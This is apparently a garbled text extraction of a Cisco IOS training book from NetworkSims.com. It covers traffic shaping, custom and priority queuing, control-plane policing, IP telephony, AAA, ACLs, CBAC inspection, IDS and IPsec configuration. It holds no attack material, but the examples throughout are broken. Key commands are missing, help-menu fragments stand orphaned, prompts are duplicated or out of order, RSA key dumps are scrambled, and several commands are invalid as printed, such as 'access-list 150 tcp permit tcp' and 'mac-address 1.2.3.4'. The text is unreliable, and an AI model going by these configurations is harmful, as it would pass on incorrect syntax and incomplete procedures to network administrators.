<cr>
(config-if)# traffic-shape rate 100 200 300

Outline
This challenge involves the traffic shaping by identifying streams with access-lists.
Objectives
Define traffic-shaping on an interface from different flows.
Example
> en
# config t
(config)# access-list 101 permit ip host 1.2.3.4 any any
(config)# access-list 102 permit ip host 1.2.3.5 any any
(config)# int s0
(config)# int s0
adaptive
group
[Be (bits)]]
rate
(config-if)# traffic-shape group ?
<1-2699> selecting Access list
(config-if)# traffic-shape group 101 ?
(config-if)# traffic-shape group 101 1000 ?
<cr>
(config-if)# traffic-shape group 101 1000
(config-if)# traffic-shape group 102 6000
NetworkSims.com
854
This defines that the average rate for traffic from 1.2.3.4 will be 1000 bps, while it will be
6000 bps from 1.2.3.5. No other shaping will occur.

Outline
This challenge involves using traffic shaping with frame relay. It detects the usage of the
BECN bits to throttle back the flow.
Objectives
Define traffic-shaping for congestion on a frame-relay interface.
Example
> en
# config t
(config)# int s0
adaptive
group
[Be (bits)]]
rate
(config-if)# traffic-shape rate 1000000
(config-if)# traffic-shape adaptive ?
<1-100000000> Lower Bound Target Bit Rate (bits per second)
(config-if)# traffic-shape adaptive 60000
(config-if)# traffic-shape fecn-adapt
This defines a committed information rate (CIR) of 60,000 bps, and an access rate of
1,000,000 bps.
FECN (Forward Explicit Congestion Notification)
BECN (Backward Explicit Congestion Notification)
Definitions:
http://searchnetworking.techtarget.com/sDefinition/0,,sid7_gci787381,00.html

NetworkSims.com
855
Outline
This challenge involves class-based shaping, where the shaping profile can be defined in a
policy-map.
Mechanisms
Objectives
Define class-based shaping.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# shape ?
adaptive
average
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]],
send out Bc only per interval
fecn-adapt
Enable Traffic Shaping reflection of FECN as BECN
fr-voice-adapt Enable rate adjustment depending on voice presence
max-buffers
Set Maximum Buffer Limit
peak
send out Bc+Be per interval
(config-pmap-c)# shape average ?
<8000-154400000> Target Bit Rate (bits per second), the value needs to be
multiple of 8000
(config-pmap-c)# shape average 8000 ?
<256-154400000> bits per interval, sustained. Needs to be multiple of 128.
Recommend not to configure it, the algorithm will find out
the best value
<cr>
NetworkSims.com
856

(config-pmap)# exit
(config)# int e0

Outline
This challenge involves CBWFQ with generic traffic shaping (GTS).
Mechanisms
Objectives
Define class-based shaping.

Define bandwidth requirements.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# shape ?
adaptive
average
send out Bc only per interval
fecn-adapt
fr-voice-adapt Enable rate adjustment depending on voice presence
max-buffers
Set Maximum Buffer Limit
peak
send out Bc+Be per interval
NetworkSims.com
857
(config-pmap-c)# shape average ?

multiple of 8000
<256-154400000> bits per interval, sustained. Needs to be multiple of 128.
Recommend not to configure it, the algorithm will find out
the best value
<cr>
(config-pmap-c)# shape peak ?
multiple of 8000
(config-pmap-c)# shape peak 300000 ?
(config-pmap)# exit
(config)# int e0
In this case the VOICE traffic will be given a bandwidth of 512 kbps, and an output which is
shaped to 800,000 bps, whereas DATA will be given a bandwidth of 256 kbps, and a peak
throughput of 300,000 bps.

Key facts
Unit 5: Congestion Aviodance, Policing, Shaping, and Link Efficiency

Outline
NetworkSims.com
858
This challenge involves setting up a crypto map and applying it to an interface, with a QoS
for a tunnel. It uses the qos pre-classified interface command which is a command that is
restriced to tunnels, crypto maps, and is not avaliable on normal interfaces.
Objectives
Define a tunnel with a QoS service policy.

Define IKE.
Example
> en
# config t
(config)# int tunnel1
(config-if)# ip 1.2.3.4 255.255.255.0
(config-if)# int tunnel1
(config-if)# crypto ?
ipsec Set IPSec parameters
map
Assign a Crypto Map
(config-if)# crypto m ?
WORD Crypto Map tag
<cr>
(config-if)# crypto m manchester
(config-if)# tunnel ?
checksum
destination
flow
key
mode
path-mtu-discovery
protection
sequence-datagrams
source
tos
ttl
udlr
enable end to end checksumming of packets

destination of tunnel
flow options
security or selector key
tunnel encapsulation method
Enable Path MTU Discovery on tunnel
Enable tunnel protection
drop datagrams arriving out of order
source of tunnel packets
set type of service byte
set time to live
associate tunnel with unidirectional interface
(config-if)# tunnel source e0

(config-if)# tunnel destination 1.2.3.4
(config-if)# qos ?
NetworkSims.com
859
pre-classify
Enable QOS classification before packets are tunnel

encapsulated
(config-if)# qos pre-classify

(config-if)# exit
136.163.130.0 0.0.255.255
(config-isakmp)# ?
ISAKMP commands:
default
encryption
exit
group
hash
lifetime
no
(config-isakmp)# encryption?
aes
des
rsa-encr
rsa-sig
(config-isakmp)# group ?
default
description
dialer
exit
match
Match values.
no
qos
set
NetworkSims.com
860
address
Match address of packets to encrypt.

<100-199>
WORD
Access-list name
identity
isakmp-profile
peer
pfs
transform-set
(config-crypto-map)# set transform-set ?
WORD Proposal tag
(config-crypto-map)# qos pre-classify
(config)# int e0
(config-if)# service-policy out ptest
(config-if)# exit
(config)# exit

Outline
This challenge involves define CoPP (Control plane policing).
Objectives
Define CoPP.
Apply the CoPP.
Example
> en
# config t
(config-cmap)# exit
NetworkSims.com
861

<8000-2000000000> Bits per second
cir
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
pir
<cr>
(config-pmap-c)# police 9000 conform ?
drop
drop packet
set-clp-transmit
set atm clp and send it
set-dscp-transmit
set dscp and send it
set-mpls-exp-transmit set exp and send it
set-prec-transmit
rewrite packet precedence and send it
set-qos-transmit
set qos-group and send it
transmit
transmit packet
(config-pmap-c)# police 9000 conform transmit ?
exceed-action action when rate is within normal and max burst
<cr>
(config-pmap-c)# police 9000 conform transmit exceed-action ?
drop
drop packet
set-clp-transmit
set atm clp and send it
set-dscp-transmit
set dscp and send it
set-mpls-exp-transmit set exp and send it
set-prec-transmit
rewrite packet precedence and send it
set-qos-transmit
transmit
transmit packet
(config-pmap-c)# police 9000 conform transmit exceed-action drop ?
violate-action action when rate is greater than max burst
<cr>
(config-pmap-c)# police 9000 conform transmit exceed drop
(config-pmap)# exit
(config)# control-plane
(config-cp)# service-policy output NEW

Outline
This challenge involves configuring telephony.
Objectives
Define telephony settings.
Example
NetworkSims.com
862
> en
# config t
(config)# telephony-service
(config-telephony)# ?
Cisco IOS Telephony Service configuration commands:
application
call-forward
Define E.164 telephone number for call forwarding
create
create cnf for ethernet phone
date-format
Set date format for IP Phone display
default
dialplan-pattern Define E.164 telephone number prefix
directory
Define directory naming order
dn-webedit
enable Edit DN through Web
exit
Exit from telephony-service configuration mode
ip
Define IP address and port for Telephony-Service/Fallback
keepalive
Define keepalive timeout period to unregister IP phones
load
Select the IP phone firmware load file
max-conferences
Define max number of 3 party G.711 conferences
max-dn
Maximum directory numbers supported
max-ephones
Define max number of IP phones
moh
Define music-on-hold filename
mwi
Define IP address and port for MWI Server
network-locale
Define ephone network locale
no
reset
reset ethernet phone
restart
restart ethernet phone
service
Service configuration in ITS
time-format
Set time format for IP Phone display
time-webedit
enable Edit Time through Web
timeouts
Define timeout value for IP phone
transfer-pattern Define valid call transfer destinations
transfer-system
Define call transfer system: blind/consult and
local/end-to-end
url
Define Ephone URL's
user-locale
Define ephone user locale
voicemail
Set the voicemail access number called when the MESSAGES IP
phone button is pressed
web
define username for admin user
(config-telephony)# max-ep ?
<1-48> Maximum phones to support
(config-telephony)# max-ep 10 ?
<cr>
(config-telephony)# max-ephones 10
(config-telephony)# max-dn ?
<1-192> Maximum directory numbers supported
(config-telephony)# max-dn 10 ?
<cr>
(config-telephony)# max-dn 10
config-telephony)# keepalive ?
NetworkSims.com
863
<10-65535>
Time in seconds
(config-telephony)# keepalive 10
(config-telephony)# system message this is a Cisco IP phone
(config-telephony)# create ?
cnf-files create XML cnf for ethernet phone
(config-telephony)# create cnf-files
(config-telephony)# ip ?
source-address Define IP address and port for Telephony-Service/Fallback
(config-telephony)# ip source-address ?
A.B.C.D Define IP source address
(config-telephony)# ip source-address 1.2.3.4 ?
port Define tcp port for Telephony Service/CM FALLBACK
<cr>
(config-telephony)# ip source-address 1.2.3.4 p ?
<2000-9999> Specify the port: 2000 - 9999
<cr>
(config-telephony)# ip source-address 192.168.0.1 port 2000
(config-telephony)# voicemail ?
WORD voicemail access number
(config-telephony)# voicemail 5555
(config-telephony)# web ?
admin
define username for admin user
customize define customization file name
(config-telephony)# web admin ?
customer customer admin
system
system admin
(config-telephony)# web admin system ?
name
admin username
password admin password
(config-telephony)# web admin system name ?
WORD username for admin
(config-telephony)# web admin system name username test password pass
(config-telephony)# dn-webedit
(config-telephony)# time-webedit

Outline
This challenge involves configuring telephony by creating directory numbers.
Objectives
NetworkSims.com
864

Define directory numbers.
Define a call forwarding number on a non-answer.
Example
> en
# config t
(config-telephony)# create cnf
(config-telephony)# web admin system name username test password pass
(config-telephony)# exit
(config)# ephone-dn 1
(config-ephone-dn)# ?
Ephone DN configuration commands:
application
call-forward
Define E.164 telephone number for call forwarding
caller-id
Configure port caller id parameters
cor
Class of Restriction on dial-peer for this dn
default
description
dn desc, for DN Qualified Display Name
exit
Exit from ephone-dn configuration mode
feed
set live feed multicast stream mode
hold-alert
Set Call On-Hold timeout alert parameters
huntstop
intercom
Define intercom/auto-call extension number
loopback-dn
Define dn-tag to create loopback dn pair with this ephone-dn
moh
set live-feed music-on-hold mode (with optional multicast)
mwi
set message waiting indicator options (mwi)
name
Define dn user name
no
number
Define E.164 telephone number
paging
set audio paging mode
preference
Preference for the attached dial-peer for the primary dn
number
transfer-mode Define call transfer mode: blind vs. consult
translate
Translation rule
(config-ephone-dn)# number 5501
(config-ephone-dn)# name fred
(config-ephone-dn)# call-forward noan 5503 timeout 10
(config-ephone-dn)# exit
(config-ephone-dn)# number ?
WORD A sequence of digits - representing telephone number
(config-ephone-dn)# number 5502 ?
no-reg
Set E164 not register
NetworkSims.com
865
secondary
secondary dn number
<cr>
(config-ephone-dn)# name ?
LINE user name, use quoted string if including spaces
(config-ephone-dn)# name bert
(config-ephone-dn)# call-forward ?
all
forward all calls
busy forward call on busy
noan forward call on no-answer
(config-ephone-dn)# call-forward all ?
WORD A sequence of digits - representing E.164 number
(config-ephone-dn)# call-forward all 5504

Outline
This challenge involves configuring telephony by creating an e-phone.
Objectives
Define an e-Phone.
Define directory numbers.
Define a call forwarding number on a non-answer.
Example
> en
# config t
(config)# ephone 1
(config-ephone)# ?
Ethernet phone configuration commands:
button
define button to dn map
default
exit
Exit from ephone configuration mode
keepalive
Define keepalive timeout period to unregister IP phone
mac-address
define ethernet phone MAC address
no
paging-dn
set audio paging dn group for phone
reset
reset ethernet phone
restart
restart ethernet phone
speed-dial
Define ip-phone speed-dial number
type
Define ip-phone type
NetworkSims.com
866
username
define username to access ethernet phone from Web
vm-device-id define voice-mail id string
(config-ephone)# mac-address ?
H.H.H Mac address
<cr>
(config-ephone)# mac-address 1.2.3.4
(config-ephone)# type ?
7910
Cisco IP Phone 7910
7935
Polycom 7935
7940
Cisco IP Phone 7940
7960
Cisco IP Phone 7960
ata
ATA phone emulation for analog phone
cipc
Cisco IP
vgc-phone vg248 phone emulation for analog phone
(config-ephone)# type cipc
(config-ephone)# button ?
LINE button-index:dn-index pairs example 1:2 2:5
(config-ephone)# button 1:1
(config-ephone)# exit
(config-telephony)# create test
(config-telephony)# exit
(config-ephone-dn)# name fred
(config-ephone-dn)# call-forward noan 5503 timeout 10
(config-ephone-dn)# exit
(config-ephone-dn)# name bert
(config-ephone-dn)# call-forward all 5504
If Cisco IP Communicator is used to simulate Ethernet phones, then the type is cipc.
For button 1:2, assigns the first button to the second directory number.

Outline
Objectives
NetworkSims.com
867
Define Auto QoS
Example
> en
# config t
(config)# cdp run
(config-vlan)# exit
(config-vlan)# exit
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
dot1p
none
(config-if)# au ?
NetworkSims.com
868

trust
(config-if)# exit
Note:
Cisco Router Challange 177

Outline
This challenge involves configuring custom queueing.
Objectives
Define custom queuing (CQ) for particular queues.

Define byte count and packet limits for each queue.
Apply the CQ onto an interface.
Example
> en
# config t
default
interface
protocol
queue
stun
(config)# queue-list 1 protocol ?
arp
IP ARP
bridge
Bridging
bstun
Block Serial Tunnel
cdp
dlsw
ip
IP
ipv6
IPV6
llc2
llc2
pad
PAD links
NetworkSims.com
869
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
snapshot
stun
Serial Tunnel
(config)# que 1 protocol ip ?
<0-16> queue number
gt
list
lt
tcp
udp
<cr>
(config)# queue-list 1 protocol ip 2 tcp ?
<0-65535>
Port number
bgp
Border Gateway Protocol (179)
chargen
Character generator (19)
cmd
Remote commands (rcmd, 514)
daytime
Daytime (13)
discard
Discard (9)
domain
Domain Name Service (53)
echo
Echo (7)
exec
Exec (rsh, 512)
finger
Finger (79)
ftp
File Transfer Protocol (21)
ftp-data
FTP data connections (20)
gopher
Gopher (70)
hostname
NIC hostname server (101)
ident
Ident Protocol (113)
irc
Internet Relay Chat (194)
klogin
Kerberos login (543)
kshell
Kerberos shell (544)
login
Login (rlogin, 513)
lpd
Printer service (515)
nntp
Network News Transport Protocol (119)
pop2
pop3
smtp
Simple Mail Transport Protocol (25)
sunrpc
syslog
Syslog (514)
tacacs
talk
Talk (517)
telnet
Telnet (23)
time
Time (37)
uucp
Unix-to-Unix Copy Program (540)
whois
Nicname (43)
www
World Wide Web (HTTP, 80)
(config)# queue-list 1 protocol ip 2 tcp 22
(config)# queue-list 1 protocol ip 2 tcp telnet
(config)# queue-list 1 protocol ip 3 tcp pop3
(config)# queue-list 1 protocol ip 3 tcp smtp
(config)# queue-list 1 protocol ip 4 tcp www
(config)# queue-list 1 queue 1 ?
NetworkSims.com
870

limit
Set queue entry limit of a particular queue
(config)# queue-list 1 queue 1 limit ?
<0-32767> number of queue entries
(config)# queue-list 1 queue 1 limit 100
(config)# queue-list 1 queue 2 byte-count 1000
(config)# int s0

Outline
This challenge involves configuring custom queueing using access-lists to define the traffic
for each queue.
Objectives
Define custom queuing (CQ) for particular queues.

Define byte count and packet limits for each queue.
Apply the CQ onto an interface.
Example
> en
# config t
# config t
gt
list
lt
tcp
udp
<cr>
(config)# queue-list 1 queue 2 limit 100
(config)# queue-list 1 queue 3 byte-count 1000
(config)# int s0
NetworkSims.com
871

Outline
This challenge involves configuring priority queueing using access-lists to define the traffic
for each queue.
Objectives
Define priority queuing (PQ) for particular queues.

Apply the PQ onto an interface.
Example
> en
# config t
# config t
(config)# priority-list ANY ?
default
interface
protocol
arp
IP ARP
bridge
Bridging
cdp
clns
ISO CLNS
clns_es
ISO CLNS End System
clns_is
cmns
ISO CMNS
compressedtcp Compressed TCP (VJ)
http
HTTP
ip
IP
llc2
llc2
pad
PAD links
pppoe
PPP over Ethernet
rsrb
snapshot
high
NetworkSims.com
872
medium
normal
low
(config)# priority-list
fragments Prioritize
gt
Prioritize
list
To specify
lt
Prioritize
tcp
Prioritize
udp
Prioritize
<cr>
1 protocol ip high ?
fragmented IP packets
packets greater than a specified size
an access list
packets less than a specified size
TCP packets 'to' or 'from' the specified port
UDP packets 'to' or 'from' the specified port
1 protocol ip high list 100
1 protocol ip low list 101
(config)# priority-list 1 queue-limit 20 40 60 80

(config)# int e0
Note:
It is also possible to base the queue on protocols, such as:
(config)# priority-list 1 protocol ip low tcp 22
(config)# priority-list 1 protocol ip high tcp www
To give a high priority for WWW traffic, and a low one for SSH.
NetworkSims.com
873
18 Security
Outline
This challenge involves the configuration of a priority group.
Objectives
Define an access-list.
Define an priority-group.
Define a route-cache.
Example
> en
# config t
<1-99>
<100-199>
<1000-1099>
IPX SAP access list
<1100-1199>
<1200-1299>
IPX summary address access list
<1300-1999>
<200-299>
<2000-2699>
<700-799>
<800-899>
IPX standard access list
<900-999>
IPX extended access list
rate-limit
deny
permit
remark
(config)# access-list 105 permit tcp host 144.93.24.10 host 131.33.204.2 eq dns
(config)# access-list 105 deny tcp host 154.31.216.9 host 26.100.164.1 eq dns
255.255.0.0 eq dns
NetworkSims.com
874
(config)# access-list 105 deny tcp 102.65.178.0 255.255.0.0 5.101.146.0 255.255.0.0

eq dns
(config)# access-list 105 permit ip ?
any
Any source host
host
(config)# access-list 105 permit ip any
any
eq
gt
host
lt
neq
range
(config)# int e0
(config)# exit
arp
IP ARP
bridge
Bridging
cdp
ip
IP
ipx
Novell IPX
llc2
llc2
pad
PAD links
snapshot
high
medium
normal
low
(config)# priority-list 1 protocol ip high ?
gt
Prioritize packets greater than a specified size
list
lt
Prioritize packets less than a specified size
tcp
udp
<cr>
(config)# priority-list 1 protocol ip high list ?
<1-199>
IP access list
(config)# priority-list 1 protocol ip high list 105
(config)# int e0
(config-if)#priority-group ?
(config-if)#priority-group 1
(config-if)# ip route-cache ?
cef
flow
policy
<cr>
(config-if)# int e1
NetworkSims.com
875

Outline
Objectives

Define timestamps.
Example
> en
# config t
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
log
<cr>
NetworkSims.com
876
uptime
<cr>
(config)# sequence-numbers
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
Enable PAD commands
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers

Outline
Objectives
Define AAA details.
Example
NetworkSims.com
877
> en
# config t
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
new-model
authen loging def radius
authen ppp def radius
author network default radius
author exec default radius

Outline
This challenge involves the configuration of Tacacs+.
Objectives
Setup of Tacacs+.
Example
> en
# config t
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
new-model
authen loging def tacacs+
authen ppp def tacacs+
author network default tacacs+
author exec default tacacs+

Outline
This challenge involves the configuration of restrictions on the local HTTP server.
NetworkSims.com
878
Objectives
Setup an ACL to permit a single host.

Apply ACL to restrict access to the HTTP server to only one host.
Example
> en
# config t
(config)# ip http ?
access-class
path
port
HTTP port
server
Enable HTTP server

Outline
This challenge involves the configuration of the HTTP server which denies a single host.
Objectives
Setup an ACL which denies a single host.

Apply the ACL to deny the host access to the HTTP server.
Example
> en
# config t
NetworkSims.com
879

Outline
This challenge involves the configuration of permiting a single host access to the Telnet
server.
Objectives
Setup an ACL to allow a single host access.

Apply the ACL to the Telnet server so that only a single host can get access.
Example
> en
# config t
<1-199>
IP access list
WORD
Access-list name
(config-line)# access-class 1 ?
in

Outline
This challenge involves the configuration to deny a single host access to the Telnet server.
Objectives
NetworkSims.com
880
Setup an ACL to deny a single host access.

Apply the ACL to the Telnet server so that only a single host cannot get access.
Example
> en
# config t

Outline
Objectives

Define SYN waits.
Example
> en
# config t
alert-off
Disable alert
audit-trail
bytes)
dns-timeout
clamping
name
one-minute
tcp
udp
<cr>
NetworkSims.com
881

low
finwait-time
idle-time
synwait-time
further data
finwait-time
idle-time
synwait-time
further data

Outline
Objectives
Setup a CBAC.
Example
> en
# config t
(config)# int fa0/0
NetworkSims.com
882

(config-if)# exit
cuseeme
CUSeeMe Protocol
fragment
ftp
h323
http
HTTP Protocol
netshow
rcmd
realaudio
Real Audio Protocol
rpc
rtsp
smtp
sqlnet
SQL Net Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
(config)# int e0
(config-if)# exit
(config)# int s0

Outline
This challenge involves the configuration of a port map.
Objectives
Define the port-mapping for various protocols.
Example
> en
# config t
NetworkSims.com
883
(config)# ip port-map http port 1126

(config)# ip port-map ftp port 1188
(config)# ip port-map smtp port 1897
(config)# ip port-map telnet port 1189
(config)# exit
# show ip port-map
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
port
7000
111
1755
7648
69
8554
7070
1558
21
23
554
1720
5060
25
80
135
512
513
1521
514
2427
1126
1188
1897
1189
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
system defined
user defined
user defined
user defined
user defined

Outline
This challenge involves the configuration of an audit trail.
Objectives
Setup logging.
Define an audit-trail.
Example
> en
# config t
NetworkSims.com
884

(config)# logging ?
buffered
cns-events
console
count
exception
facility
history
host
Set syslog server host name or IP address
monitor
on
rate-limit
source-interface
transactions
trap
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
(severity=6)
warnings
Warning conditions
(severity=4)
<cr>
(config)# logging trap warning
(config)# logging monitor warning
(config)# logging console warning
<0-7>
alerts
critical
Critical conditions
debugging
Debugging messages
emergencies
System is unusable
errors
Error conditions
informational
notifications
Normal but significant conditions
warnings
Warning conditions
<cr>
(config)# logging buffer warnings
(config)# no ip inspect alert-off
(severity=1)
(severity=2)
(severity=7)
(severity=0)
(severity=3)
(severity=6)
(severity=5)
(severity=4)

Outline
NetworkSims.com
885
This challenge involves the configuration to deny an incoming SYN packet.
Objectives
Apply an extended ACL which detects the SYN packet.
Example
> en
#config t
(config)# access-list 107 deny tcp any any ?
ack
Match on the ACK bit
dscp
Match packets with given dscp value
eq
established Match established connections
fin
Match on the FIN bit
fragments
Check non-initial fragments
gt
log
log-input
Log matches against this entry, including input interface
lt
neq
precedence
Match packets with given precedence value
psh
Match on the PSH bit
range
rst
Match on the RST bit
syn
Match on the SYN bit
time-range
Specify a time-range
tos
Match packets with given TOS value
urg
Match on the URG bit
<cr>
(config)# access-list 107 deny tcp any any established
(config)# int s0
<1-199>
WORD
Access-list name
in
inbound packets

Outline
This challenge involves the configuration of an authentication proxy.
NetworkSims.com
886
Objectives
Define AAA.
Setup an authentication proxy.
Example
> en
# config t
(config)# ip http ?
access-class
path
port
HTTP port
server
Enable HTTP server
aaa
Use AAA access control methods
local
(config)# ip http authentication aaa
auth-cache-time
Authorization Cache Timeout in min
auth-proxy-audit
auth-proxy-banner Authentication Proxy Banner
name
<cr>
(config)# ip auth-proxy auth-cache-time ?
(config)# ip auth-proxy auth-cache-time 45
(config)# ip auth-proxy name yellow http
(config)# int fa0
(config-if)# ip auth-proxy yellow
(config-if)# exit
# show ip auth-proxy configuration
# sh ip auth-proxy config
Authentication global cache time is 40 minutes

http list not specified auth-cache-time 40 minutes
NetworkSims.com
887

Outline
This challenge involves the configuration of IDS rules.
Objectives
Setup IDS rules.

Define a SPAM filter.
Example
> en
# config t
(config)# ip
attack
info
name
notify
audit ?
alarms
po
to the nr-directors
smtp
(config)# ip audit notify ?
log
Send events as syslog messages
nr-director Send events to the nr-director
(config)# ip audit notify log
(config)# ip audit ?
attack
info
name
notify
alarms
po
to the nr-directors
smtp
(config)# ip audit info ?
action Specify the actions
(config)# ip audit info action ?
alarm Generate events for matching signatures
drop
Drop packets matching signatures
reset Reset the connection (if applicable)
(config)# ip audit info action drop
(config)# ip audit attack action reset
(config)# ip audit signature ?
NetworkSims.com
888
<1-65535> Signature to be configured

(config)# ip audit signature 1005 disable
(config)# ip audit smtp ?
spam Specify the threshold for spam signature
<cr>
(config)# ip audit smtp spam ?
<1-65535> Threshold of correspondents to trigger alarm
(config)# ip audit smtp spam 4

Outline
Objectives

Define encryption.
Example
> en
# config t
(config)# crypto
(config)# crypto
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config)# crypto
(config)# crypto
(config)# crypto
isakmp enable
isakmp policy 111
encryption des
hash sha
group 1
exit
NetworkSims.com
889

Outline
Objectives

Define IKE.
Example
> en
# config t
136.163.130.0 0.0.255.255
(config-cryto-map)# match address 109
(config-cryto-map)# set peer 144.55.62.1
(config-cryto-map)# set transform-set finland
(config-cryto-map)# exit
(config)# int e0
(config-if)# crypto map manchester
NetworkSims.com
890

Outline
Objectives

Example
> en
# config t
61.222.47.2
61.222.47.2
61.222.47.2 eq isakmp
london
london
london
london
(config)# int e0

NetworkSims.com
891
Outline
This challenge involves setting blocking SNMP.
Objectives
Define an access-list to block SNMP.

Disable SNMP-server commands.
Example
> en
# config t
(config)# access-list 110 deny udp any any eq snmp
(config)# int e0
(config-if)# exit
(config)# no snmp-server community annt RO
(config)# no snmp-server contact steven
(config)# no snmp-server location uk
(config)# no snmp-server host 78.113.70.11
(config)# no snmp-server enable traps
(config)# no snmp-server chassis-ID paris

Outline
This challenge involves manually configuring RSA keys for peers.
NetworkSims.com
892
Objectives
Define the public key for a given host.

Specify the key.
Example
> en
# config t
(config)# cryto key pubkey-chain rsa
(config-pubkey-chain)# addressed-key 142.217.4.10
(config-pubkey-key)# exit
(config-pubkey-chain)# exit
(config)# exit
# show crypto key pubkey rsa
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
01234567
0123

Outline
Objectives
Define EIGRP.
NetworkSims.com
893
Example
# config t
(config-if)# exit
Router Challenge 124: SSH Explained

Explanation
ap# config t
End with CNTL/Z.

Key Data:
305C300D 06092A86 4886F70D 01010105
F1499B01 49C485A2 20C9FB37 8CD11053
32020F80 910AFBCC 6D402F90 96E8A59B
NetworkSims.com
UTC Mar 1 2002
00034B00 30480241 00DDD8C6 4B744520

039D344B 3C5BD55E E84E17C8 FD62DA08
40467A3E 8FEED18B B1020301 0001
894
% Key pair was generated at:

Key Data:
307C300D 06092A86 4886F70D
312319CA 0E919F76 72D2D5A9
D07C0000 832F6A1C 81411423
AE8EFA46 282AEC54 F0909F82
00:42:21 UTC Mar 1 2002
01010105
36B4710C
BE52CBF4
466A19DD
00036B00
CC4DE0C4
ECBE417E
EBEFAEDE
30680261
080D2B47
1C3C09D1
7B4B992F
00B435A4
55970CA5
2BBC90DF
5F020301
C007251B
39F21170
8DA398DB
0001

To get rid of keys:

Telnet sessions:

Outline
This challenge involves configuring intercept.
Objectives
NetworkSims.com
895
Define a host to intercept.

Enable intercept
Example
> enable
# config t
(config)# access-list 150 tcp permit tcp any host 172.10.1.1
(config)# ip tcp intercept list 150
(config)# ip tcp intercept mode intercept

Outline
This challenge involves defining protocols that should be inspected.
Objectives
Define the name of the inspection.

Applied it on a port
Example
> enable
# config t
L2-transparent Transparent Mode commands
alert-off
Disable alert
audit-trail
bytes)
dns-timeout
hashtable-size Specify size of hashtable
clamping
name
one-minute
tcp
udp
<cr>
(config)# ip inspect name ?
(config)# ip inspect name test ?
cuseeme
CUSeeMe Protocol
esmtp
Extended SMTP
NetworkSims.com
896
fragment
ftp
h323
http
HTTP Protocol
icmp
ICMP Protocol
netshow
rcmd
realaudio
Real Audio Protocol
rpc
rtsp
sip
SIP Protocol
skinny
Skinny Client Control Protocol
smtp
sqlnet
SQL Net Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
(config)# ip inspect name test ftp
(config)# ip inspect name test h323
(config)# ip inspect name test http
(config)# int e0
(config-if)# ip inspect ?
(config-if)# ip inspect test in
(config-if)# int e1
(config-if)# ip inspect test out
Explanation
Inspection rules are used to define the traffic types and applications that are to be inspected.
First the applications to be monitored are defined, such as:
(config)#ip inspect name BILLS ?
cuseeme
CUSeeMe Protocol
fragment
ftp
h323
http
HTTP Protocol
netshow
rcmd
realaudio
Real Audio Protocol
rpc
rtsp
smtp
sqlnet
SQL Net Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
such as for HTTP, FTP and TCP:

(config)# ip inspect name BILLS http
NetworkSims.com
897
(config)# ip inspect name BILLS ftp

(config)# ip inspect name BILLS tcp
(config)# exit
#show ip inspect all
Session audit trail is disabled
Session alert is enabled
one-minute (sampling period) thresholds are [400:500] connections
max-incomplete sessions thresholds are [400:500]
max-incomplete tcp connections per host is 50. Block-time 0 minute.
tcp synwait-time is 30 sec -- tcp finwait-time is 5 sec
tcp idle-time is 3600 sec -- udp idle-time is 30 sec
dns-timeout is 5 sec
Inspection Rule Configuration
Inspection name BILLS
http alert is on audit-trail is off timeout 3600
ftp alert is on audit-trail is off timeout 3600
tcp alert is on audit-trail is off timeout 3600
Note that the name of the rule is case sensitive, such as:
#show ip inspect name bills
%Inspect name bills is not defined
# show ip inspect name BILLS
http alert is on audit-trail is off timeout 3600
ftp alert is on audit-trail is off timeout 3600
tcp alert is on audit-trail is off timeout 3600
http alert is on audit-trail is on timeout 3600
ftp alert is on audit-trail is on timeout 3600
tcp alert is on audit-trail is on timeout 3600
18.1.1
Applying an Inspection Rule to an interface
CBACs are used along with ACLs, as the CBAC modifies the ACL in order that it operates
correctly. An inspection rule is applied in a similar way to an ACL, such as:
(config)# access-list 101 permit ip 10.0.0.1 0.0.0.255 any
(config)#int fa0
(config-if)#ip inspect BILLS ?
in
Inbound inspection
out Outbound inspection
Notice no traffic is
allowed on the incoming
port. The CBAC fixes
this.
(config-if)#ip inspect BILLS in

(config-if)#ip access-group 101 in
and:
(config)# access-list 102 permit tcp any host 10.0.0.1 eq www
NetworkSims.com
898
(config)#int s0
(config-if)#ip access-group 102 in
which applies the BILLS inspection rule onto the FA0 interface for the incoming direction.
Thus when a host on the network which connects to the FA0 interface initiates a connection
with a remote Web server, the inspection rule kicks in an modifies ACL number 102, to
allow the conversation between the hosts. If there was no inspection rule the reply would be
blocked. If a host from outside the network (connected to S0) tries to connect to a node
inside the network with it being first being initiated, its traffic would be blocked, as the
CBAC will have no record of a connection.
To test a CBAC:
#sh ip inspect config
Session audit trail is enabled
Session alert is enabled
one-minute (sampling period) thresholds are [400:500] connections
